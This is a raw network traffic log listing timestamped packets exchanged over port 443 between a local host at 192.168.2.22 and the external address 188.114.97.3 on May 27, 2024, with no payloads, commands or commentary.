May 27, 2024 18:35:33.165572882 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.165652990 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.165664911 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.165695906 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.165721893 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.166280985 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.166338921 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.166353941 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.166387081 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.166419029 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.167138100 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.167196989 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.167201996 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.167237043 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.167263985 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.167958021 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.168015957 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.168028116 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.168051004 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.168082952 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.168968916 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.169023991 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.169032097 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.169063091 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.169090986 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.169892073 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.169953108 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.169961929 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.169984102 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.170017958 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.170923948 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.170979977 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.170986891 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.171010017 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.171042919 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.206706047 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.206778049 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.206799030 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.206835985 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.206861973 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.252774954 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.252854109 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.252861977 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.252896070 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.252922058 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.253525019 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.253582001 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.253602982 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.253626108 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.253660917 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.254796982 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.254858971 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.254858017 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.254884005 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.254924059 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.255774021 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.255831957 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.255842924 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.255867958 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.255897999 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.256781101 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.256839037 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.256843090 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.256867886 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.256902933 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.257749081 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.257810116 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.257817984 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.257839918 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.257867098 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.258586884 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.258651972 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.258661985 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.258702993 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.258759975 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.258768082 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.339778900 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.339843035 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.339855909 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.339890003 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.339926004 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.339935064 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.339941978 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.340004921 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.341094017 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341113091 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341145992 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.341176987 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341223955 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.341231108 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341806889 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341855049 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.341861963 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341881990 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.341923952 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.341936111 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.342706919 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.342761040 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.342768908 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.342796087 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.342820883 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.343595982 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.343650103 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.343663931 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.343691111 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.343724012 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.344602108 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.344659090 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.344664097 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.344691038 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.344722986 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.345438004 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.345489025 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.345495939 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.345516920 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.345565081 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.345571041 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.346287966 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.346343994 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.346350908 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.346384048 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.346498013 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.346504927 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.427988052 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428052902 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.428060055 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428087950 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428117990 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.428633928 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428692102 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.428698063 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428721905 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428738117 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.428749084 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.428817987 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.429394007 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.429450035 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.429459095 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.429480076 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.429507017 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.430229902 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.430280924 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.430291891 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.430315018 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.430361986 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.430368900 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.431096077 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.431148052 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.431157112 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.431169987 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.431220055 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.431226015 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.431967020 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.432023048 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.432035923 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.432059050 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.432087898 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.432972908 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.433042049 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.433051109 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.433073997 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.433101892 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.433867931 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.433921099 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.433934927 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.433957100 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.433986902 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.516042948 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516119957 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.516129017 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516160965 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516180992 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.516628027 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516684055 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.516701937 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516727924 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516760111 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.516761065 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.516803980 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.517273903 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.517338037 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.517345905 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.517369032 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.517398119 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.518157005 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.518215895 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.518229008 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.518256903 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.518287897 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.522674084 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.522735119 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.522737026 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.522773027 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.522802114 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.523066044 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523123026 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.523133993 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523156881 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523189068 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.523400068 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523454905 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.523463964 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523478031 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523528099 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.523535013 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523612976 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523668051 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.523683071 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523714066 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.523752928 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.603961945 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.604032993 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.604046106 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.604069948 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.604088068 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.604700089 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.604758978 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.604772091 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.604796886 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.604832888 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.605472088 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.605531931 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.605534077 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.605561018 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.605595112 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.606472969 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.606538057 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.606548071 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.606570959 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.606622934 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.606631041 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.607126951 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.607182026 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.607188940 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.607218027 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.607254028 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.608283043 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.608355999 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.608367920 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.608398914 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.608436108 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.609415054 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.609471083 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.609477997 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.609499931 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.609528065 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.609539986 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.610816002 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.610877037 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.610882998 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.610904932 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.610933065 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.691615105 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.691678047 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.691687107 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.691713095 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.691745043 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.692475080 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.692538023 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.692538977 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.692562103 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.692591906 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.692595959 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.692631960 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.693521023 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.693586111 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.693589926 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.693608046 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.693635941 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.694224119 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.694281101 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.694291115 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.694317102 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.694365978 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.694629908 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.694690943 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.694691896 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.694715023 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.694746971 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.694781065 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.697968960 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.698033094 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.698051929 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.698061943 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.698081017 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.698107958 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.698690891 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.698754072 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.698759079 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.698776007 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.698807001 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.698848009 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.699541092 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.699632883 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.699634075 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.699656963 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.699737072 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.699737072 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.779593945 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.779661894 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.779670000 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.779696941 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.779731035 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.780281067 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.780339956 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.780344009 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.780369043 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.780385017 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.780400991 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.780426025 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.781367064 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.781426907 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.781429052 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.781461000 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.781502962 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.781730890 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.781788111 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.781810999 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.781862974 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.782768965 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.782855034 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.782875061 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.782938957 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.786087036 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.786148071 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.786154032 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.786175966 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.786205053 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.786345005 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.786407948 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.786413908 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.786439896 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.786468983 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.787309885 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.787365913 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.787373066 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.787400007 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.787430048 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.874886036 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.874957085 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.874958038 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.874988079 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.875019073 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.875075102 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.875672102 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.875691891 CEST	443	49173	188.114.97.3	192.168.2.22
May 27, 2024 18:35:33.875729084 CEST	49173	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:33.875751972 CEST	443	49173	188.114.97.3	192.168.2.22
